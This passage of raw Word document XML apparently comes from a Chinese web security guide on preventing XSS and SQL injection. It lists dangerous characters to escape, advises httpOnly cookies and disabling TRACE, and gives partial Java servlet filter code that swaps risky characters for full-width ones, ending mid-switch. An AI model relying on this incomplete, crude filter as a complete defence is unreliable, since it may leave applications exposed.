              </w:rPr>
              <w:t>（回车符，</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ASCII 0x0d</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C89ABF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5] LF</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（换行，</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ASCII 0x0a</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="189668D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6] ,</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（逗号）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D3FBDB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7] \</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（反斜杠）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="715EF51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2</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、在请求返回页面关键字符进行转义；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62EE6A9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1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>“（双引号）：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&amp;quot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F7C3C3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2] </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（单引号）：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&amp;apos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C1F9CA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3] &amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>符号）：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&amp;amp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33CA22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4] &lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（左尖括号）：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&amp;lt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C89A6C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5] &gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（右尖括号）：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&amp;gt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77CF76B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在不影响应用的前提下，建议将</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>标记为</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>httpOnly</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，同时禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>TRACE</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>方法。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EBA674B"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lastRenderedPageBreak/>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>业务开发的过滤器如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED0165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在用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>业务开发的时候，对于页面上接收到的参数，除了极少数是步可预知的内容外，大量的参数名和参数值都是不会出现触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Xss</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的字符。而通常为了避免</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Xss</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞，都是开发人员各自在页面输出和数据入库等地方加上各种各样的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>encode</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法来避免</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Xss</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题。而由于开发人员的水平不一，加上在编写代码的过程中安全意识的差异，可能会粗心漏掉对</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>用户输入内容进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>encode</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理。针对这种大量参数是不可能出现引起</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Xss</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入漏洞的业务场景下，因此可以使用一个适用大多数业务场景的通用处理方法，牺牲少量用户体验，来避免</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Xss</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750D1445" w14:textId="3D34530C"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利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的过滤器机制，编写定制的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XssFilter</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求代理，覆盖</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getParameter</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getHeader</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将参数名和参数值里的指定半角字符，强制替换成全角字符。使得在业务层的处理时不用担心会有异常输入内容。</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945D39" w:rsidRPr="00B8545D" w14:paraId="12753537" w14:textId="77777777" w:rsidTr="001A6FF2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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40A60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XssFilter.java</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C2EF12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ackage filter;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE53F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io.IOException;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78C1FA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Filter;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B2E02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FilterChain;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D4E1D1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FilterConfig;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58BF154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ServletException;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="359F624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ServletRequest;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E8983A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ServletResponse;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C8C52F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http.HttpServletRequest;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E56C702" w14:textId="77777777" w:rsidR="00945D39" w:rsidRPr="00B8545D" w:rsidRDefault="00945D39" w:rsidP="00B8545D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="121D814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class XssFilter implements Filter {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10F63E4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void init(FilterConfig config) throws ServletException {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51BF81A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ADCEFE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void doFilter(ServletRequest request, ServletResponse response,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48EC58C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FilterChain chain) throws IOException, ServletException </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E164DF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8B9D2C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XssHttpServletRequestWrapper xssRequest = new XssHttpServletRequestWrapper(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD6D74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HttpServletRequest) request);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C0EB7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hain.doFilter(xssRequest, response);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B92824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1E9C11E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void destroy() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6467319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5E65EE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XssHttpServletRequestWrapper.java</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D4613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package filter;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BA37B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http.HttpServletRequest;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29CED0F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http.HttpServletRequestWrapper;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E324167" w14:textId="77777777" w:rsidR="00945D39" w:rsidRPr="00B8545D" w:rsidRDefault="00945D39" w:rsidP="00B8545D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="690411C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class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C2B588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HttpServletRequest orgRequest = null;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05EF632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XssHttpServletRequestWrapper(HttpServletRequest request) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BBC50B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uper(request);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1270A1F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orgRequest = request;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060270C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6AC3E6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8E3E32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覆盖</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>getParameter</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>方法，将参数名和参数值都做</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>xss</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过滤。</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;br/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="198DCC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如果需要获得原始的值，则通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>super.getParameterValues(name)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来获取</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;br/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FEA031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getParameterNames,getParameterValues</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>getParameterMap</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>也可能需要覆盖</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F8662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17CAE5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Override</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="073A5A7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String getParameter(String name) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64AC520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tring value = super.getParameter(xssEncode(name));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41D4B4F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 (value != null) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182FEF7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value = xssEncode(value);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0203038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8ABDE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value;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="048CBA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5CB4B5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315F35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覆盖</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>getHeader</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>方法，将参数名和参数值都做</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>xss</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过滤。</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;br/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C24326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如果需要获得原始的值，则通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>super.getHeaders(name)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来获取</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;br/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13AF952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getHeaderNames </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>也可能需要覆盖</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F9FF5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7EC678D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Override</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F1692B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String getHeader(String name) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="400762C1" w14:textId="77777777" w:rsidR="00945D39" w:rsidRPr="00B8545D" w:rsidRDefault="00945D39" w:rsidP="00B8545D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76644BA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tring value = super.getHeader(xssEncode(name));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00B6E85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 (value != null) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03FCEF2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value = xssEncode(value);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="196FB4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D6449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value;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B5C849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7585A4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38BDD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将容易引起</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>xss</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞的半角字符直接替换成全角字符</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67C658E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F4C729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param s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72D44C2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turn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5579D9A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E9F5D6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rivate static String xssEncode(String s) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02CEA5F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 (s == null || s.isEmpty()) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CC29A8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s;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60AEE8B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12188E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tringBuilder sb = new StringBuilder(s.length() + 16);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E8D94A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for (int i = 0; i &lt; s.length(); i++) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="488DA8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har c = s.charAt(i);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D8EFFB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witch (c) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71F63F3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gt;':</w:t>
            </w:r>
          </w:p>
